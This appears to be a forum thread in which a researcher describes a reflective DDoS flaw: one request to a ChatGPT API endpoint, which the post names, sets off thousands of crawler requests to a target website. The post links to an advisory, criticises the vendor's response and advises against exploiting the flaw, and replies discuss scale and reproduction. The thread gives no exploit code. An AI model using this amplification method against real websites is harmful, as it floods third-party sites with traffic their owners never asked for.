Haha, this would be an amazing way to test the ChatGPT crawler reflective DDOS vulnerability [1] I published last week.
Basically a single HTTP Request to ChatGPT API can trigger 5000 HTTP requests by ChatGPT crawler to a website.
The vulnerability is/was thoroughly ignored by OpenAI/Microsoft/BugCrowd but I really wonder what would happen when ChatGPT crawler interacts with this tarpit several times per second. As ChatGPT crawler is using various Azure IP ranges I actually think the tarpit would crash first.
The vulnerability reporting experience with OpenAI / BugCrowd was really horrific. It's always difficult to get attention for DOS/DDOS vulnerabilities and companies always act like they are not a problem. But if their system goes dark and the CEO calls then suddenly they accept it as a security vulnerability.
I spent a week trying to reach OpenAI/Microsoft to get this fixed, but I gave up and just published the writeup.
I don't recommend you to exploit this vulnerability due to legal reasons.
[1] https://github.com/bf/security-advisories/blob/main/2025-01-...
Is 5000 a lot? I'm out of the loop but I thought c10k was solved decades ago? Or is it about the "burstiness" of it?
(That all the requests come in simultaneously -- probably SSL code would be the bottleneck.)
Nice find, I think one of my sites actually got recently hit by something like this. And yea, this kind of thing should be trivially preventable if they cared at all.
Am I correct in understanding that you waited at most one week for a reply?
In my experience with large companies, that's rather short. Some nudging may be required every now and then, but expecting a response so fast seems slightly unreasonable to me.
What is the https://chatgpt.com/backend-api/attributions endpoint doing (or responsible for when not crushing websites).
has anyone tested this working? I get a 301 in my terminal trying to send a request to my site
How can it reach localhost or is this only a placeholder for a real address?
Try it and let us know :)
I am not surprised that OpenAI is not interested if fixing this.